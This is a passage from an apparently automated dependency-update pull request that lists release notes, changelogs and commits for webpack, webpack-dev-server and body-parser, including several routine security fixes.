used.\u003c/li\u003e\n\u003cli\u003e2179fdb: Re-validate HttpUriPlugin redirects against allowedUris, restrict to http(s) and add a conservative redirect limit to prevent SSRF and untrusted content inclusion. Redirects failing policy are rejected before caching/lockfile writes.\u003c/li\u003e\n\u003cli\u003ed3dd841: Serialize \u003ccode\u003eHookWebpackError\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003ed3dd841: Added ability to use built-in properties in dotenv and define plugin.\u003c/li\u003e\n\u003cli\u003e3c4319f: Optimizing the regular expression character class by specifying ranges for runtime code.\u003c/li\u003e\n\u003cli\u003ed3dd841: Reduce collision for local indent name in CSS.\u003c/li\u003e\n\u003cli\u003ed3dd841: Remove CSS link tags when CSS imports are removed.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc\"\u003e\u003ccode\u003e24e3c2d\u003c/code\u003e\u003c/a\u003e chore(release): new release (\u003ca href=\"https://redirect.github.com/webpack/webpack/issues/20253\"\u003e#20253\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/2efd21b0b06baa9b1a7f009b336379dcef24c1a5\"\u003e\u003ccode\u003e2efd21b\u003c/code\u003e\u003c/a\u003e fix(re-exports): reexports runtime calculation should not accessing `__WEBPAC...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/c5100702335a9cdcb75558ccd80def2329bd4abf\"\u003e\u003ccode\u003ec510070\u003c/code\u003e\u003c/a\u003e fix(security): userinfo bypass vulnerability in HttpUriPlugin allowedUris\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/4b0501c69700963bad1285b56f9cfa74704cb963\"\u003e\u003ccode\u003e4b0501c\u003c/code\u003e\u003c/a\u003e ci: fix release (\u003ca href=\"https://redirect.github.com/webpack/webpack/issues/20252\"\u003e#20252\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/0c213cecf2906bc41102c3a4cfdd1ad3522d0171\"\u003e\u003ccode\u003e0c213ce\u003c/code\u003e\u003c/a\u003e ci: use \u003ccode\u003e\\\u0026lt;@\u0026amp;1450591255485743204\u0026gt;\u003c/code\u003e over \u003ccode\u003e@here\u003c/code\u003e for discord notificationw\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/5bf8bc51bcfb49d25b73aae450b246cd8b8b423a\"\u003e\u003ccode\u003e5bf8bc5\u003c/code\u003e\u003c/a\u003e refactor: types for benchmarks and tests\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/505a5e744fbcf4471ddb534bf1d4aebea9643c1b\"\u003e\u003ccode\u003e505a5e7\u003c/code\u003e\u003c/a\u003e chore(release): new release (\u003ca href=\"https://redirect.github.com/webpack/webpack/issues/20188\"\u003e#20188\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/0c066808d59e4f9406e11bab4ffa2e0feacbd0e2\"\u003e\u003ccode\u003e0c06680\u003c/code\u003e\u003c/a\u003e refactor: update eslint configuration\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/2eb0d6a410513960bd7d65bf15baf15704a612eb\"\u003e\u003ccode\u003e2eb0d6a\u003c/code\u003e\u003c/a\u003e ci: release announcement (\u003ca href=\"https://redirect.github.com/webpack/webpack/issues/20238\"\u003e#20238\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/b2b24590a08755b706d2009ca97a226addf9e83b\"\u003e\u003ccode\u003eb2b2459\u003c/code\u003e\u003c/a\u003e ci: cancel in progress (\u003ca href=\"https://redirect.github.com/webpack/webpack/issues/20239\"\u003e#20239\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/webpack/webpack/compare/v5.88.0...v5.104.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eInstall script changes\u003c/summary\u003e\n\u003cp\u003eThis version modifies \u003ccode\u003eprepare\u003c/code\u003e script that runs during installation. Review the package contents before updating.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `webpack-dev-server` from 4.15.1 to 5.2.4\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack-dev-server/releases\"\u003ewebpack-dev-server's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.2.4\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.3...v5.2.4\"\u003e5.2.4\u003c/a\u003e (2026-05-11)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eset Cross-Origin-Resource-Policy header to prevent source code theft over HTTP\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.3\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.2...v5.2.3\"\u003e5.2.3\u003c/a\u003e (2026-01-12)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd \u003ccode\u003ecause\u003c/code\u003e for \u003ccode\u003eerrorObject\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5518\"\u003e#5518\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/37b033da2c48335178495a1987c469a26ef3de60\"\u003e37b033d\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ecompatibility with event target and universal target and lazy compilation  (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/574026c44b9c51f0bbd2f5a2836c54607289a071\"\u003e574026c\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eoverlay:\u003c/strong\u003e add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003ef91baa8\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eprogress indicator styles (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5557\"\u003e#5557\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/41a53a1accdb0a90785d82cbe8a079794eeed3c8\"\u003e41a53a1\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eupgrade selfsigned to v5\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.2\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.1...v5.2.2\"\u003e5.2.2\u003c/a\u003e (2025-06-03)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u0026quot;Overlay enabled\u0026quot; false positive (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/18e72ee3e57a6e7598a6c068c0ff7c7bb6a857f1\"\u003e18e72ee\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edo not crush when error is null for runtime errors (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5447\"\u003e#5447\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/309991f947baa0354140b9930a9654ac792e20c4\"\u003e309991f\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eremove unnecessary header \u003ccode\u003eX_TEST\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5451\"\u003e#5451\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/64a6124bf1b4d158bb42a4341dd03121ae3759fa\"\u003e64a6124\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003erespect the \u003ccode\u003eallowedHosts\u003c/code\u003e option for cross-origin header check (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5510\"\u003e#5510\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/03d12141bf7be09dfb14e91e5c834ee63bd9a9a2\"\u003e03d1214\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.0...v6.0.0\"\u003e5.2.1\u003c/a\u003e (2025-03-26)\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ecross-origin requests are not allowed unless allowed by \u003ccode\u003eAccess-Control-Allow-Origin\u003c/code\u003e header\u003c/li\u003e\n\u003cli\u003erequests with an IP addresses in the \u003ccode\u003eOrigin\u003c/code\u003e header are not allowed to connect to WebSocket server unless configured by \u003ccode\u003eallowedHosts\u003c/code\u003e or it different from the \u003ccode\u003eHost\u003c/code\u003e header\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThe above changes may make the dev server not work if you relied on such behavior, but unfortunately they carry security risks, so they were considered as fixes.\u003c/p\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eprevent overlay for errors caught by React error boundaries (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5431\"\u003e#5431\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/8c1abc903ab444d9ce99e567b9a6c603e1ec06be\"\u003e8c1abc9\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003etake the first network found instead of the last one, this restores the same behavior as 5.0.4 (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5411\"\u003e#5411\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/ffd0b86b790d372f90e17aea92cfd9def83fee96\"\u003effd0b86\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.0\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.1.0...v5.2.0\"\u003e5.2.0\u003c/a\u003e (2024-12-11)\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack-dev-server/blob/main/CHANGELOG.md\"\u003ewebpack-dev-server's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.3...v5.2.4\"\u003e5.2.4\u003c/a\u003e (2026-05-11)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eset Cross-Origin-Resource-Policy header to prevent source code theft over HTTP\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.2...v5.2.3\"\u003e5.2.3\u003c/a\u003e (2026-01-12)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd \u003ccode\u003ecause\u003c/code\u003e for \u003ccode\u003eerrorObject\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5518\"\u003e#5518\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/37b033da2c48335178495a1987c469a26ef3de60\"\u003e37b033d\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ecompatibility with event target and universal target and lazy compilation  (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/574026c44b9c51f0bbd2f5a2836c54607289a071\"\u003e574026c\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eoverlay:\u003c/strong\u003e add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003ef91baa8\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eprogress indicator styles (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5557\"\u003e#5557\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/41a53a1accdb0a90785d82cbe8a079794eeed3c8\"\u003e41a53a1\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eupgrade selfsigned to v5\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.1...v5.2.2\"\u003e5.2.2\u003c/a\u003e (2025-06-03)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u0026quot;Overlay enabled\u0026quot; false positive (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/18e72ee3e57a6e7598a6c068c0ff7c7bb6a857f1\"\u003e18e72ee\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edo not crush when error is null for runtime errors (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5447\"\u003e#5447\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/309991f947baa0354140b9930a9654ac792e20c4\"\u003e309991f\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eremove unnecessary header \u003ccode\u003eX_TEST\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5451\"\u003e#5451\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/64a6124bf1b4d158bb42a4341dd03121ae3759fa\"\u003e64a6124\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003erespect the \u003ccode\u003eallowedHosts\u003c/code\u003e option for cross-origin header check (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5510\"\u003e#5510\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/03d12141bf7be09dfb14e91e5c834ee63bd9a9a2\"\u003e03d1214\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.0...v6.0.0\"\u003e5.2.1\u003c/a\u003e (2025-03-26)\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ecross-origin requests are not allowed unless allowed by \u003ccode\u003eAccess-Control-Allow-Origin\u003c/code\u003e header\u003c/li\u003e\n\u003cli\u003erequests with an IP addresses in the \u003ccode\u003eOrigin\u003c/code\u003e header are not allowed to connect to WebSocket server unless configured by \u003ccode\u003eallowedHosts\u003c/code\u003e or it different from the \u003ccode\u003eHost\u003c/code\u003e header\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThe above changes may make the dev server not work if you relied on such behavior, but unfortunately they carry security risks, so they were considered as fixes.\u003c/p\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eprevent overlay for errors caught by React error boundaries (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5431\"\u003e#5431\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/8c1abc903ab444d9ce99e567b9a6c603e1ec06be\"\u003e8c1abc9\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003etake the first network found instead of the last one, this restores the same behavior as 5.0.4 (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5411\"\u003e#5411\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/ffd0b86b790d372f90e17aea92cfd9def83fee96\"\u003effd0b86\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.1.0...v5.2.0\"\u003e5.2.0\u003c/a\u003e (2024-12-11)\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadded \u003ccode\u003egetClientEntry\u003c/code\u003e and \u003ccode\u003egetClientHotEntry\u003c/code\u003e methods to get clients entries (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/dc642a832d45c23c5c7a08fbf29995e0db7e0d95\"\u003edc642a8\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/fd401308f1cc026262880e2dab810004d6444282\"\u003e\u003ccode\u003efd40130\u003c/code\u003e\u003c/a\u003e chore(release): 5.2.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/ece4f3617bea31fb6d3833f69a32b6c289959a49\"\u003e\u003ccode\u003eece4f36\u003c/code\u003e\u003c/a\u003e chore: update deps (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5661\"\u003e#5661\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/a2161442a314a06a97e25d1404d08410cb4e9c51\"\u003e\u003ccode\u003ea216144\u003c/code\u003e\u003c/a\u003e ci: fix test (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5658\"\u003e#5658\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/df073c53a8cefb54210b43813fa6ee60364a554e\"\u003e\u003ccode\u003edf073c5\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/b550a702bd4246d1724513b70de0bfbe6604672f\"\u003e\u003ccode\u003eb550a70\u003c/code\u003e\u003c/a\u003e chore(release): 5.2.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/9704dc52e3f696ae1446428c25882745e9b65cbb\"\u003e\u003ccode\u003e9704dc5\u003c/code\u003e\u003c/a\u003e chore: upgrade selfsigned to v5 and remove node-forge dependency (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5618\"\u003e#5618\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/92bf644784741e8ea5adaa4a1dc26f4d462f223d\"\u003e\u003ccode\u003e92bf644\u003c/code\u003e\u003c/a\u003e chore: bump express to update qs (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5621\"\u003e#5621\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/792b2f0bd13a3b93abf701fe3a5cf41ee16722f4\"\u003e\u003ccode\u003e792b2f0\u003c/code\u003e\u003c/a\u003e chore(deps-dev): bump the dependencies group with 4 updates (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5606\"\u003e#5606\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/6d587cab3e023675de2feedf81bcdfcec7d5b774\"\u003e\u003ccode\u003e6d587ca\u003c/code\u003e\u003c/a\u003e chore(deps): bump the dependencies group across 1 directory with 27 updates (...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003e\u003ccode\u003ef91baa8\u003c/code\u003e\u003c/a\u003e fix(overlay): add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v4.15.1...v5.2.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eInstall script changes\u003c/summary\u003e\n\u003cp\u003eThis version modifies \u003ccode\u003eprepare\u003c/code\u003e script that runs during installation. Review the package contents before updating.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `body-parser` from 1.20.1 to 1.20.5\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/expressjs/body-parser/releases\"\u003ebody-parser's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.20.5\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cp\u003eThe reason for this release is a fix to the extended urlencoded parser returning objects instead of arrays for large array inputs (\u0026gt; 100) on qs@6.14.2+. (\u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/716\"\u003eexpressjs/body-parser#716\u003c/a\u003e)\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003erefactor(json): simplify strict mode error string construction by \u003ca href=\"https://github.com/jonchurch\"\u003e\u003ccode\u003e@​jonchurch\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/692\"\u003eexpressjs/body-parser#692\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: correct off-by-one error in parameterCount by \u003ca href=\"https://github.com/abhu85\"\u003e\u003ccode\u003e@​abhu85\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/716\"\u003eexpressjs/body-parser#716\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edeps(qs): bump qs to 6.15.1 by \u003ca href=\"https://github.com/jonchurch\"\u003e\u003ccode\u003e@​jonchurch\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/722\"\u003eexpressjs/body-parser#722\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRelease: 1.20.5 by \u003ca href=\"https://github.com/jonchurch\"\u003e\u003ccode\u003e@​jonchurch\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/721\"\u003eexpressjs/body-parser#721\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/abhu85\"\u003e\u003ccode\u003e@​abhu85\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/716\"\u003eexpressjs/body-parser#716\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eSpecial thanks to triager \u003ca href=\"https://github.com/krzysdz\"\u003e\u003ccode\u003e@​krzysdz\u003c/code\u003e\u003c/a\u003e for keeping this on our radar and effectively triaging the specific issue!\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/expressjs/body-parser/compare/1.20.4...1.20.5\"\u003ehttps://github.com/expressjs/body-parser/compare/1.20.4...1.20.5\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e1.20.4\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eRemove redundant depth check by \u003ca href=\"https://github.com/blakeembrey\"\u003e\u003ccode\u003e@​blakeembrey\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/538\"\u003eexpressjs/body-parser#538\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: add support for Node.js v23 by \u003ca href=\"https://github.com/Phillip9587\"\u003e\u003ccode\u003e@​Phillip9587\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/553\"\u003eexpressjs/body-parser#553\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: restore CI for 1.x branch by \u003ca href=\"https://github.com/bjohansebas\"\u003e\u003ccode\u003e@​bjohansebas\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/665\"\u003eexpressjs/body-parser#665\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edeps: qs@^6.14.0 by \u003ca href=\"https://github.com/bjohansebas\"\u003e\u003ccode\u003e@​bjohansebas\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/664\"\u003eexpressjs/body-parser#664\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edeps: use tilde notation and update certain dependencies by \u003ca href=\"https://github.com/Phillip9587\"\u003e\u003ccode\u003e@​Phillip9587\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/668\"\u003eexpressjs/body-parser#668\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore: remove SECURITY.md by \u003ca href=\"https://github.com/Phillip9587\"\u003e\u003ccode\u003e@​Phillip9587\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/669\"\u003eexpressjs/body-parser#669\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: add CodeQL (SAST) by \u003ca href=\"https://github.com/Phillip9587\"\u003e\u003ccode\u003e@​Phillip9587\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/670\"\u003eexpressjs/body-parser#670\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRelease: 1.20.4 by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/672\"\u003eexpressjs/body-parser#672\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/expressjs/body-parser/compare/1.20.3...1.20.4\"\u003ehttps://github.com/expressjs/body-parser/compare/1.20.3...1.20.4\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e1.20.3\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003ch3\u003eImportant\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003edeps: qs@6.13.0\u003c/li\u003e\n\u003cli\u003eadd \u003ccode\u003edepth\u003c/code\u003e option to customize the depth level in the parser\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eIMPORTANT:\u003c/strong\u003e The default \u003ccode\u003edepth\u003c/code\u003e level for parsing URL-encoded data is now \u003ccode\u003e32\u003c/code\u003e (previously was \u003ccode\u003eInfinity\u003c/code\u003e). \u003ca href=\"https://github.com/expressjs/body-parser/blob/17529513673e39ba79886a7ce3363320cf1c0c50/README.md#depth\"\u003eDocumentation\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eOther changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003echore: add support for OSSF scorecard reporting by \u003ca href=\"https://github.com/inigomarquinez\"\u003e\u003ccode\u003e@​inigomarquinez\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/522\"\u003eexpressjs/body-parser#522\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: fix errors in ci github action for node 8 and 9 by \u003ca href=\"https://github.com/inigomarquinez\"\u003e\u003ccode\u003e@​inigomarquinez\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/523\"\u003eexpressjs/body-parser#523\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: pin to node@22.4.1 by \u003ca href=\"https://github.com/wesleytodd\"\u003e\u003ccode\u003e@​wesleytodd\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/527\"\u003eexpressjs/body-parser#527\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edeps: qs@6.12.3 by \u003ca href=\"https://github.com/melikhov-dev\"\u003e\u003ccode\u003e@​melikhov-dev\u003c/code\u003e\u003c/a\u003e in \u003ca 